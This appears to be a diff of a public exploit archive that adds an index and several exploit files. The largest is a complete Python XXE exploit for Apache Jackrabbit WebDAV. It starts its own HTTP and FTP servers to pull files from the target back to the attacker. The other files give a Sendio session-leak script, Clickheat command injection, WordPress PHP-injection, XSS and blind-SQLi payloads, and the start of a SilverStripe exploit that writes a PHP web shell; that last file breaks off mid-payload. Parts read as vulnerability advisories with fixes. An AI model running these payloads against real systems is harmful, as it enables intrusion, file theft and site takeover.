37117,platforms/perl/webapps/37117.txt,"Croogo CMS 1.3.4 Multiple HTML Injection Vulnerabilities",2012-04-29,"Chokri Ben Achor",perl,webapps,0
37118,platforms/php/webapps/37118.txt,"SKYUC 3.2.1 'encode' Parameter Cross Site Scripting Vulnerability",2012-04-27,farbodmahini,php,webapps,0
37119,platforms/asp/webapps/37119.txt,"XM Forum 'id' Parameter Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0
37120,platforms/php/webapps/37120.txt,"Uiga FanClub 'p' Parameter SQL Injection Vulnerability",2012-04-27,"Farbod Mahini",php,webapps,0
37121,platforms/asp/webapps/37121.txt,"BBSXP CMS Multiple SQL Injection Vulnerabilities",2012-04-27,"Farbod Mahini",asp,webapps,0
37122,platforms/php/webapps/37122.txt,"Shawn Bradley PHP Volunteer Management 1.0.2 'id' Parameter SQL Injection Vulnerability",2012-04-28,eidelweiss,php,webapps,0
37123,platforms/php/webapps/37123.txt,"WordPress WPsc MijnPress Plugin 'rwflush' Parameter Cross Site Scripting Vulnerability",2012-04-30,Am!r,php,webapps,0
37124,platforms/windows/dos/37124.txt,"Acoustica Pianissimo 1.0 Build 12 (Registration ID) Buffer Overflow PoC",2015-05-26,LiquidWorm,windows,dos,0

Can't render this file because it is too large.

9
platforms/asp/webapps/37119.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/53292/info
XM Forum is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/[patch]/profile.asp?$sid=&id=[SQL]
http://www.example.com/[patch]/forum.asp?$sid=&id=[SQL]
http://www.example.com/[patch]/topic.asp?$sid=&id=[SQL]

11
platforms/asp/webapps/37121.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/53298/info
BBSXP CMS is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/ShowPost.asp?ThreadID=[SQL]
http://www.example.com/blog.asp?id=[SQL]
http://www.example.com/ShowForum.asp?ForumID=[SQL]
http://www.example.com/Profile.asp?UserName=[SQL]
http://www.example.com/print.asp?id=[SQL]

382
platforms/java/webapps/37110.py Executable file
View file

@ -0,0 +1,382 @@
#!/usr/bin/env python
"""
# Exploit Title: Jackrabbit WebDAV XXE
# Date: 25-05-2015
# Software Link: http://jackrabbit.apache.org/jcr/
# Exploit Author: Mikhail Egorov
# Contact: 0ang3el () gmail com
# Website: http://0ang3el.blogspot.com
# CVE: CVE-2015-1833
# Category: webapps
1. Description
Jackrabbit WebDAV plugin use insecurely configured XML parser to parse
incoming PROPPATCH and PROPFIND requests. As a result it is vulnerable to
XXE attacks.
Besides Jackrabbit JCR, WebDAV plugin is incorporated into the following
software: Apache Sling, Adobe AEM.
2. Proof of Concept
Download vulnerable Apache Sling launchpad web application from here -
https://sling.apache.org
Start launchpad web application as follows:
root@kali:~/build-sling# java -jar
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
Launch exploit with the following command:
root@kali:~# python cve-2015-1833.py --url http://127.0.0.1:8080/content/xxe
--tech oob --ip 127.0.0.1
enter command> get .
loaded 210 bytes in buffer
enter command> show
apache-maven-3.0.5
apache-maven-3.0.5-bin.tar.gz
derby.log
eclipse
hs_err_pid5379.log
org.apache.sling.launchpad-8-SNAPSHOT-standalone.jar
python-workspace
enter command> store /tmp/cwd.lst
buffer content has been stored in file /tmp/cwd.lst
enter command> exit
root@kali:~#
Exploit have three exploitation techniques:
* inb1 - inbound XXE technique, it first writes content as attribute value
of controllable JCR node using PROPPATCH request and then retrieves content
using PROPFIND request
* inb2 - same as inb1, but there is some XML magic to retrieve content that
is not valid XML data
* oob - out-of-bound technique, utilizes FTP hack from this blog
http://lab.onsec.ru/2014/06/xxe-oob-exploitation-at-java-17.html
Technique inb2 is the most stable. But it requires credentials of the user
that is able to modify some JCR node. Attacker host must have "visible ip"
which is required for communication between target and attacker's host.
Technique oob works even with anonymous credentials. But it is not so
stable as inb2 technique.
Technique inb1 does not require "visible ip", but there are limitations on
retrieved content.
3. Solution:
If you use Apache Jackrabbit, install version 2.10.1.
http://www.apache.org/dist/jackrabbit/2.10.1/RELEASE-NOTES.txt
"""
from urllib2 import *
import sys, string, random
import base64
import xml.etree.ElementTree as ET
import BaseHTTPServer, SimpleHTTPServer
from multiprocessing import Process, Value, Manager
from optparse import OptionParser
import socket, select
usage= """
%prog --url <url> --tech inb1 [ --creds <creds> ]
%prog --url <url> --tech inb2 --ip <ip> [ --creds <creds> --hport <hport> ]
%prog --url <url> --tech oob --ip <ip> [ --creds <creds> --hport <hport> --fport <fport>]
"""
help_interpreter = """
help - print this help.
get <dir or file> - retrieve directory listing or file content and store it inside internal buffer. You can use "." to denote current directory (e.g. use "get ." for cwd listing).
show - show content of internal buffer.
store <out file> - store internal buffer in file.
exit - stop exploiting
"""
failure_descr = """
Possible reasons:
1. Inappropriate technique, try another options.
2. You do not have permissions to read file or list directory.
3. Target is not exploitable.
"""
rand_attr = ''
script_name = sys.argv[0].split('/')[-1]
buffer_with_loot = ''
url, tech, ip, creds, hport, fport = [None] * 6
http_server, ftp_server = [None] * 2
class HTTP_XXE():
def __init__(self, ip, port, fport):
self.port = port
self.ip = ip
self.fport = fport
def run(self):
class http_handler(BaseHTTPServer.BaseHTTPRequestHandler):
def __init__(self, ip, fport,*args):
self.ip = ip
self.fport = fport
BaseHTTPServer.BaseHTTPRequestHandler.__init__(self, *args)
def do_GET(self):
if "inb2" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY all "%start;%loot;%end;">')
if "oob" in self.path:
self.send_response(200)
self.send_header('Content-type','application/xml')
self.end_headers()
self.wfile.write('<?xml version="1.0" encoding="utf-8"?><!ENTITY %% all "<!ENTITY &#37; send SYSTEM "ftp://%(ip)s:%(port)s/%%loot;">">%%all;' % {'ip' : self.ip, 'port' : self.fport})
def log_message(self, format, *args): # silent HTTP server
return
def serve(httpd):
while True:
httpd.handle_request()
handler = lambda *args: http_handler(self.ip, self.fport, *args)
httpd = BaseHTTPServer.HTTPServer(('0.0.0.0', self.port), handler)
self.proc = Process(target = serve, args = (httpd,))
self.proc.start()
def stop(self):
self.proc.terminate()
class FTP_XXE():
def __init__(self, port):
self.port = port
def run(self):
class ftp_handler():
def __init__(self, port):
self.server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.setblocking(0)
self.server.bind(('0.0.0.0', port))
self.server.listen(5)
def serve(self, d):
inputs = [self.server]
while True:
readable, writable, exceptional = select.select(inputs, [], [])
for s in readable:
if s is self.server:
connection, client_address = s.accept()
connection.setblocking(0)
inputs.append(connection)
connection.send("220 xxe-ftp-server\n")
else:
data = s.recv(1024)
if not data:
inputs.remove(s)
continue
if "USER" in data:
s.send("331 password please - version check\n")
else:
s.send("230 more data please!\n")
if not len([x for x in ["PASS","EPSV","EPRT","TYPE"] if x in data]):
d['loot'] += data
self.d = Manager().dict()
self.d['loot'] = ''
ftpd = ftp_handler(self.port)
self.proc = Process(target = ftpd.serve, args=(self.d,))
self.proc.start()
def stop(self):
self.proc.terminate()
def clean_buf(self):
self.d['loot'] = ''
def get_loot(self):
loot = self.d['loot']
# clean data
loot = loot.replace('\r\nRETR ','/')
loot = loot.replace('\r\nCWD ','/')
loot = loot.replace('CWD ','',1)
loot = loot.replace('RETR ','',1)
return loot
def exploit(url, technique, creds = 'anonymous:anonymous'):
global buffer_with_loot, rand_attr
requests = {
'inb1' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY loot SYSTEM "%(file)s"> ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&loot;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'inb2' : {
'PROPPATCH' : '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE propertyupdate [ <!ENTITY %% start "<![CDATA["> <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% end "]]>"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/inb2"> %%dtd; ]> <D:propertyupdate xmlns:D="DAV:"> <D:set> <D:prop> <%(attr_name)s>&all;</%(attr_name)s> </D:prop> </D:set> </D:propertyupdate>',
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
},
'oob' : {
'PROPFIND': '<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE propfind [ <!ENTITY %% loot SYSTEM "%(file)s"> <!ENTITY %% dtd SYSTEM "http://%(ip)s:%(port)s/oob"> %%dtd; %%send; ]> <D:propfind xmlns:D="DAV:"> <allprop/> </D:propfind>'
}
}
def request(url, verb, data, creds, timeout):
req = Request(url, data)
req.add_header('User-Agent', script_name)
req.add_header('Content-Type', 'application/xml')
req.add_header('Authorization', 'Basic ' + base64.b64encode(creds))
req.get_method = lambda: verb
#req.set_proxy('127.0.0.1:8081','http') ### For debug
resp = None
try:
resp = urlopen(req, timeout = timeout).read()
except Exception, e:
pass
return resp
while 1:
cmdline = raw_input('\033[33menter command> \033[0m')
cmdline = re.sub('\s+', ' ', cmdline)
cmd = cmdline.split(' ')[0]
arg = cmdline.split(' ')[-1]
if cmd not in ['help', 'get', 'show', 'store', 'exit']:
print '\n\033[36mno such command, use help for command list \033[0m\n'
continue
if cmd == 'exit':
break
if cmd == 'help':
print '\033[36m' + help_interpreter + '\033[0m'
continue
if cmd == 'show':
print '\n\033[36m' + buffer_with_loot + '\033[0m'
continue
if cmd == 'store':
with open(arg,'w') as outf:
outf.write(buffer_with_loot)
print '\n\033[32mbuffer content has been stored in file ' + arg + '\033[0m\n'
continue
if cmd == 'get':
if arg.startswith('.'):
arg = '/proc/self/cwd' + arg[1:]
arg = 'file://' + arg
rand_attr = ''.join([random.choice(string.ascii_lowercase) for i in range(10)]) ### random attribute name where we place content
if technique == 'inb1':
request1 = requests['inb1']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb1']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text
except:
buffer_with_loot = ''
if technique == 'inb2':
request1 = requests['inb2']['PROPPATCH'] % {'attr_name' : rand_attr, 'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPPATCH', request1, creds, timeout = 30)
request2 = requests['inb2']['PROPFIND']
loot = request(url, 'PROPFIND', request2, creds, timeout = 30)
try:
buffer_with_loot = ET.fromstring(loot).findall('.//' + rand_attr)[0].text.replace('<[CDATA[','').replace(']]>','')
except:
buffer_with_loot = ''
if technique == 'oob':
request1 = requests['oob']['PROPFIND'] % {'file' : arg, 'ip' : ip, 'port' : hport}
request(url, 'PROPFIND', request1, creds, timeout = 8)
buffer_with_loot = ftp_server.get_loot()
ftp_server.clean_buf()
len_ = sys.getsizeof(buffer_with_loot) - sys.getsizeof('')
print "\n\033[32mloaded %s bytes in buffer\033[0m\n" % len_
if not len_:
print '\033[36m' + failure_descr + '\033[0m'
continue
def parse_options():
global url, tech, ip, creds, hport, fport
parser = OptionParser(usage = usage)
parser.add_option('--url', dest = url, help = 'url parameter')
parser.add_option('--tech', dest = tech, help = 'technique, valid values are: inb1, inb2, oob')
parser.add_option('--creds', dest = creds, help = 'user credentials, default value is anonymous:anonymous')
parser.add_option('--ip', dest = ip, help = 'ip address of netw interface that your target is able to access')
parser.add_option('--hport', dest = hport, help = 'port for HTTP server which will be launched during attack, default is 9998')
parser.add_option('--fport', dest = fport, help = 'port for FTP server which will be launched during attack, default is 9999')
(options, args) = parser.parse_args()
if not options.url or not options.tech:
print 'you must specify url and tech parameters'
sys.exit(2)
if options.tech not in ['inb1', 'inb2', 'oob']:
print 'invalid tech parameter'
sys.exit(2)
if options.tech != 'inb1' and not options.ip:
print 'you must specify ip parameter'
sys.exit(2)
url = options.url
tech = options.tech
ip = options.ip
creds = options.creds if options.creds else 'anonymous:anonymous'
hport = options.hport if options.hport else 9998
fport = options.fport if options.fport else 9999
parse_options()
if tech != 'inb1':
http_server = HTTP_XXE(ip, hport, fport)
http_server.run()
if tech == 'oob':
ftp_server = FTP_XXE(fport)
ftp_server.run()
exploit(url, tech, creds)
if tech != 'inb1':
http_server.stop()
if tech == 'oob':
ftp_server.stop()

145
platforms/jsp/webapps/37114.txt Executable file
View file

@ -0,0 +1,145 @@
1. Advisory Information
Title: Sendio ESP Information Disclosure Vulnerability
Advisory ID: CORE-2015-0010
Advisory URL: http://www.coresecurity.com/advisories/sendio-esp-information-disclosure-vulnerability
Date published: 2015-05-22
Date of last update: 2015-05-22
Vendors contacted: Sendio
Release mode: Coordinated release
2. Vulnerability Information
Class: OWASP Top Ten 2013 Category A2 - Broken Authentication and Session Management [CWE-930], Information Exposure [CWE-200]
Impact: Security bypass
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2014-0999, CVE-2014-8391
3. Vulnerability Description
Sendio [1] ESP (E-mail Security Platform) is a network appliance which provides anti-spam and anti-virus solutions for enterprises. Two information disclosure issues were found affecting some versions of this software, and can lead to leakage of sensitive information such as user's session identifiers and/or user's email messages.
4. Vulnerable Packages
Sendio 6 (14.1120.0)
Other products and versions might be affected too, but they were not tested.
5. Vendor Information, Solutions and Workarounds
Sendio informs us that [CVE-2014-0999] and [CVE-2014-8391] are fixed on Sendio software Version 7.2.4.
For [CVE-2014-0999], the vulnerability only exists for HTTP web sessions and not HTTPS web sessions. Sendio recommends that customers who have not upgraded to Version 7.2.4 should disallow HTTP on their Sendio product and only use HTTPS.
6. Credits
This vulnerability was discovered and researched by Martin Gallo from Core Security's Consulting Services Team. The publication of this advisory was coordinated by Joaquín Rodríguez Varela from Core Security's Advisories Team.
7. Technical Description / Proof of Concept Code
7.1. Disclosure of session cookie in Web interface URLs
The Sendio [1] ESP Web interface authenticates users with a session cookie named "jsessionid". The vulnerability [CVE-2014-0999] is caused due the way the Sendio ESP Web interface handles this authentication cookie, as the "jsessionid" cookie value is included in URLs when obtaining the content of emails. The URLs used by the application follow this format:
http://<ESP-web-interface-domain>:<ESP-web-interface-port>/sendio/ice/cmd/msg/body;jsessionid=<session-identifier-value>?id=<message-id>
This causes the application to disclose the session identifier value, allowing attackers to perform session hijacking. An attacker might perform this kind of attack by sending an email message containing links or embedded image HTML tags pointing to a controlled web site, and then accessing the victim's session cookies through the "Referrer" HTTP header. Accessing this authentication cookie might allow an attacker to hijack a victim's session and obtain access to email messages or perform actions on behalf of the victim.
7.2. Response mixup in Web interface
The vulnerability [CVE-2014-8391] is caused by an improper handling of users' sessions by the Web interface. Under certain conditions, this could lead to the server disclosing sensitive information that was intended for a different user. This information includes, for instance, other users' session identifiers, email message identifiers or email message subjects. In order to trigger this vulnerability, requests should be authenticated.
The following Python script can be used to trigger this vulnerability under certain circumstances:
import requests
domain = "target.domain.com" # The target domain
port = 8888 # The target port
jsessionid = "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX" # A valid jsessionid
num = 100000 # No of request to make
msgid = 9999999 # A valid message id to baseline the requests
url = "http://%s:%d/sendio/ice/cmd/msg/body;jsessionid=%s" % (domain, port, jsessionid)
def make_request(id):
params = {"id": str(id)}
headers = {"Cookie": "JSESSIONID=%s" % jsessionid}
return requests.get(url, params=params, headers=headers)
print "[*] Reaching the target to define baseline"
r = make_request(msgid)
baseline_length = r.headers["content-length"]
print "[*] Defined baseline: %d bytes" % baseline_length
for id in range(0, num):
r = make_request(msgid)
rlength = int(r.headers["content-length"])
if r.status_code == 200 and rlength != baseline_length:
print "\t", r.status_code, rlength, r.text
else:
print "\t", r.status_code, rlength
8. Report Timeline
2015-03-26: Core Security sent an initial notification to Sendio informing them that multiple vulnerabilities were found in one of their products, and requested their PGP keys in order to start an encrypted communication.
2015-03-27: Sendio replied that they would not be able to use PGP keys, but stated that their In/out SMTP gateway uses TLS, so that should suffice. They detailed that they were working on a fix for the "CS_SENDIO_JSESSIONID_DISCLOSURE" vulnerability and estimated it would be released by the end of April, 2015. They requested additional technical details for the "CS_SENDIO_INFO_LEAK" vulnerability.
2015-03-30: Core Security informed that understood that Sendio may not be able to use PGP keys, but Core doesn't consider the use of TLS as a replacement for PGP. Core Security requested to receive confirmation from Sendio in case they wanted to keep the communications unencrypted with PGP in order to send them a draft version of the advisory.
2015-03-30: Sendio confirmed that the communication can remain "as is" without PGP. They will inform Core once they have a specific date for publishing the fix. Sendio requested a PoC for the "CS_SENDIO_INFO_LEAK vulnerability".
2015-03-31: Core Security sent a draft version of the advisory and PoC to Sendio.
2015-03-31: Sendio confirmed reception of the advisory and PoC and informed Core that they would provide an update on their test on April 6.
2015-04-06: Sendio informed Core that they were able to reproduce the "CS_SENDIO_INFO_LEAK" issue and that were still analyzing it in order to create a fix.
2015-04-07: Core Security requested an estimated date for the release of a fix/update.
2015-04-13: Core Security again requested an answer from Sendio regarding the release of a fix/update.
2015-04-13: Sendio informed Core they were still working on a fix for the JSession issue that covers all use cases across Microsoft Outlook and the various supported web browsers. For the "CS_SENDIO_INFO_LEAK" they had coded a fix that was undergoing a System Test. Sendio estimated the release would take place on May 15, 2015.
2015-04-20: Sendio informed Core they were still planning to release the fixes by May 15, 2015.
2015-04-20: Core Security thanked Sendio for the update and informed them they would schedule their security advisory accordingly.
2015-04-24: Core Security requested that Sendio delay the release date of the fixes until Monday, May 18 in order to avoid publishing them on a Friday.
2015-04-27: Sendio informed Core that many of their customers have their Sendio systems set to "automatically update" on weekends. Sendio requested Core publish their advisory a week after the fix is published. Sendio also requested the ability to add some workarounds into Core's advisory.
2015-04-28: Core Security informed Sendio that they understood their update policy and let them know that it is Core's policy to publish their advisory the same day the fix is released in order to inform the affected users of its availability. Core also stated that they were willing to add any workarounds Sendio proposed.
2015-05-05: Sendio informed Core that they were still having problems developing a fix for the JSession vulnerability, therefore they may have to postpone the release date from May 15 to May 22.
2015-05-07: Core Security thanked Sendio for the update and requested to be kept informed in order to have enough time to schedule their advisory.
2015-05-12: Sendio confirmed that they needed to delay the publication of the fixes until May 21. Additionally, Sendio sent Core the proposed workarounds to be added in Core's advisory and requested a draft copy of it.
2015-05-15: Core Security informed Sendio it would reschedule the publication of their advisory and would send them a draft copy of it once they produced the final version.
2015-05-20: Sendio informed Core that they would publish the fixes at 10 PM, May 21.
2015-05-20: Core Security informed Sendio that based on their publication time they would have to delay the release of the advisory until Friday 22.
2015-05-22: Advisory CORE-2015-0010 published.
9. References
[1] http://www.sendio.com/.
10. About CoreLabs
CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com.
11. About Core Security Technologies
Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations.
Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com.
12. Disclaimer
The contents of this advisory are copyright (c) 2015 Core Security and (c) 2015 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/
13. PGP/GPG Keys
This advisory has been signed with the GPG key of Core Security advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc.

37
platforms/perl/webapps/37115.txt Executable file
View file

@ -0,0 +1,37 @@
Clickheat 1.13+ Unauthenticated RCE
-----------------------------------
The Clickheat developers have been informed, but have not responded to my email. The code has not been updated recently and the project seems to be in an abandoned state.
I have discovered a vulnerability in Clickheat 1.13 onwards that would allow an attacker to execute arbitrary commands on the remote webserver, in the context of the user running the webserver, without authentication. This could lead to unauthenticated access to the Clickheat web application, and potentially complete takeover of the remote webserver.
For the exploit to be successful, the webserver (Apache was tested in this case) must be configured to handle Perl (.pl) scripts and have the ExecCGI directive present in the VirtualHost configuration.
The issue stems from a script called parseClickLogs.pl in the /scripts directory of clickheat. If the Apache configuration is setup as above, this script will be executed when a user visits /clickheat/scripts/parseClickLogs.pl, as shown in Apache logs:
[Tue May 12 13:36:27.068012 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] AH01215: usage: ./parseClickLogs.pl apache_logs_file dest_path [domain_ignored]
[Tue May 12 13:36:27.070133 2015] [cgi:error] [pid 10783] [client 127.0.0.1:45523] End of script output before headers: parseClickLogs.pl
Arbitrary parameters can be supplied to the script directly from the URL, separated by +'s.
In the script, on line 48 is a vulnerable open() command:
open(LOGFILE, $srcFile) or die("Impossible d'ouvrir le fichier ".$srcFile);
The open() command is vulnerable because the $srcFile parameter has not been sanitized in any way, it is simply the first parameter passed into the script. Also the open() command has not been explicitly set for input only, meaning its behavior can be manipulated by appending a pipe (|) symbol to input parameters. See here for discussion: http://www.cgisecurity.com/lib/sips.html.
POC
----
The following POC shows how to gain access to the Clickheat configuration data by copying /clickheat/config/config.php to a plain text file for viewing.
- Copy config.php using arbitrary commands on the server:
GET /clickheat/scripts/parseClickLogs.pl?cp ../config/config.php conf.txt|+two
- View newly created copy of config.php (\ is appended to the filename)
GET /clickheat/scripts/conf.txt\
Mitigation
----------
A simple mitigation would be to either remove this script if it is not required by the core functionality of Clickheat, or move it outside of the publicly accessible HTML path. You could also explicitly set the open() to only allow for input, such as:
open(LOGFILE, "<$srcFile") or die("Impossible d'ouvrir le fichier ".$srcFile);

24
platforms/perl/webapps/37117.txt Executable file
View file

@ -0,0 +1,24 @@
source: http://www.securityfocus.com/bid/53287/info
Croogo CMS is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Croogo CMS 1.3.4 is vulnerable; other versions may also be affected.
URL: http://www.example.com/croogo/admin/users
<td>"><iframe src="a" onload='alert("VL")' <<="" td=""> <td>"><iframe src=a onload=alert("VL")
<</td> <td>asdasd () aol com</td>
<td><a href="/croogo/admin/users/edit/2">Edit</a> <a href="/croogo/admin/users/delete/2/token:
c68c0779f65f5657a8d17c28daebcc7a15fe51e3"
onclick="return confirm('Are you sure?');">Delete</a></td></tr>
URL: http://www.example.com/croogo/admin/roles
<tr class="striped"><td>4</td> <td>"><iframe src="a" onload='alert("VL")'
<<="" td=""> <td>"><iframe src=a onload=alert("VL") <</td> <td>
<a href="/croogo/admin/roles/edit/4">Edit</a> <a href="/croogo/admin/roles/delete

26
platforms/php/webapps/37111.txt Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: Wordpress MailChimp Subscribe Forms Remote Code Execution
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/mailchimp-subscribe-sm/
# Software Link: https://downloads.wordpress.org/plugin/mailchimp-subscribe-sm.1.1.zip
# Version: 1.1
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/121081
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7935
# Category: webapps
1. Description
Remote Code Execution via email field.
2. Proof of Concept
POST Request
sm_email=<?php echo 'Current PHP version: '. phpversion();?>&submit=
When the admin user checks the subscibers list, the php code is executed.
3. Solution
Fixed in version 1.2

50
platforms/php/webapps/37112.txt Executable file
View file

@ -0,0 +1,50 @@
# Exploit Title: Wordpress church_admin Stored XSS
# Date: 21-04-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/church-admin/
# Version: 0.800
# OSVDB ID : http://www.osvdb.org/show/osvdb/121304
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/7999
# Category: webapps
1. Description
On the registration form the address field is not validated before returning it to the user.
Visiting the Directory page, will show the confirm window.
2. Proof of Concept
POST /wordpress/index.php/2015/05/21/church_admin-registration-form/
save=yes&church_admin_register=9d18cf0420&_wp_http_referer=%2Fwordpress%2Findex.php%2F2015%2F05%2F21%2Fchurch_admin-registration-form%2F&first_name%5B%5D=test&prefix%5B%5D=&last_name%5B%5D=test&mobile%5B%5D=%2B3670&people_type_id%5B%5D=1&email%5B%5D=test%40test.test&sex1=male&phone=%2B3670&address=%3Cscript%3Econfirm%28%29%3C%2Fscript%3E&lat=51.50351129583287&lng=-0.148193359375&recaptcha_challenge_field=03AHJ_VuvBRBO1Vts65lchUe_H_c1AuISniJ4rFDcaPyecjg-HypsHSZSfTkCyZMUC6PjVQAkkuFDfpnsKn28LU8wIMxb9nF5g7XnIYLt0qGzhXcgX4LSX5ul7tPX3RSdussMajZ-_N1YQnOMJZj8b5e5LJgK68Gjf8aaILIyxKud2OF2bmzoZKa56gt1jBbzXBEGASVMMFJ59uB9FsoJIzVRyMJmaXbbrgM01jnSseeg-thefo83fUZS9uuqrBQgqAZGYMmTWdgZ4xvrzXUdv5Zc76ktq-LWKPA&recaptcha_response_field=134
GET /wordpress/index.php/2015/05/21/church_admin-directory/
<header class="entry-header">
<h1 class="entry-title">church_admin directory</h1> </header><!-- .entry-header -->
<div class="entry-content">
<p><a href="http://localhost/wordpress/?download=addresslist&addresslist=d759d84e16&member_type_id=1,2">PDF version</a></p><form name="ca_search" action="" method="POST">
<p><label style="width:75px;float:left;">Search</label><input name="ca_search" type="text"/><input type="submit" value="Go"/><input type="hidden" name="ca_search_nonce" value="99de1bedec"/></p></form><div class="tablenav"><div class="tablenav-pages"><div class="pagination"></div>
</div></div>
<div class="church_admin_address" itemscope itemtype="http://schema.org/Person">
<div class="church_admin_name_address" >
<p><span itemprop="name"><strong>test test</strong></span></p>
<p><span itemprop="address" itemscope itemtype="http://schema.org/PostalAddress"><script>confirm()</script></span></p></div><!--church_admin_name_address-->
<div class="church_admin_phone_email">
<p> <a class="email" href="tel:+3670">+3670</a><br/>
<a class="email" href="tel:+3670"><span itemprop="telephone">+3670</span></a><br/>
<a class="email" itemprop="email" href="mailto:test@test.test">test@test.test</a><br/>
</p>
</div><!--church_admin_phone_email-->
3. Solution
Fixed in version 0.810.

55
platforms/php/webapps/37113.txt Executable file
View file

@ -0,0 +1,55 @@
# Exploit Title: Wordpess Simple Photo Gallery Blind SQL Injection
# Date: 12-05-2015
# Exploit Author: woodspeed
# Vendor Homepage: https://wordpress.org/plugins/simple-photo-gallery/
# Version: 1.7.8
# Tested on: Apache 2.2.22, PHP 5.3.10
# OSVDB ID : http://www.osvdb.org/show/osvdb/122374
# WPVULNDB ID : https://wpvulndb.com/vulnerabilities/8000
# Category: webapps
1. Description
Unauthenticated Blind SQL Injection via gallery_id field.
2. Proof of Concept
http://localhost/wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id=1&image_id=14
./sqlmap.py --dbms=MYSQL --technique T -u http://localhost/wordpress/index.php/wppg_photogallery/wppg_photo_details/?gallery_id=1&image_id=14
sqlmap identified the following injection points with a total of 60 HTTP(s) requests:
---
Parameter: gallery_id (GET)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: gallery_id=1 AND (SELECT * FROM (SELECT(SLEEP(5)))QBzh)
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: gallery_id=1 UNION ALL SELECT CONCAT(0x7176787071,0x76576b586376794b756d,0x71707a7171)--
---
web server operating system: Linux Ubuntu 13.04 or 12.04 or 12.10 (Raring Ringtail or Precise Pangolin or Quantal Quetzal)
web application technology: Apache 2.2.22, PHP 5.3.10
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner: '5.5.43-0ubuntu0.12.04.1'
current user: 'wordpress@localhost'
current database: 'wordpress'
---
3. Solution
Fixed in version 1.8.0

75
platforms/php/webapps/37116.py Executable file
View file

@ -0,0 +1,75 @@
source: http://www.securityfocus.com/bid/53282/info
SilverStripe is prone to a remote PHP code-injection vulnerability.
An attacker can exploit this issue to inject and execute arbitrary PHP code in the context of the affected application. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.
SilverStripe 2.4.7 is vulnerable; other versions may also be affected.
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import httplib, urllib, urllib2,sys, getopt
def Menu():
print "\n\n-------------------------------------------------------"
print "-Kullanim Klavuzu [ USAGE ] "
print "-------------------------------------------------------"
print "- Temel Kullanim - I [ Default Usage ] : "
print "- python exo.py www.target.com / \n"
print "- Temel Kullanim - II [ Default Usage ] : "
print "- python exo.py www.target.com /path/ \n"
if (len(sys.argv) <= 2) or (len(sys.argv) > 3):
Menu()
exit(1)
host = sys.argv[1]
path = sys.argv[2]
print " [+] Exploit ediliyor..!"
payload="blackcandy');fwrite(fopen("
payload+='"../shellcik.php","w"), '
payload+="'<?php $gelen"
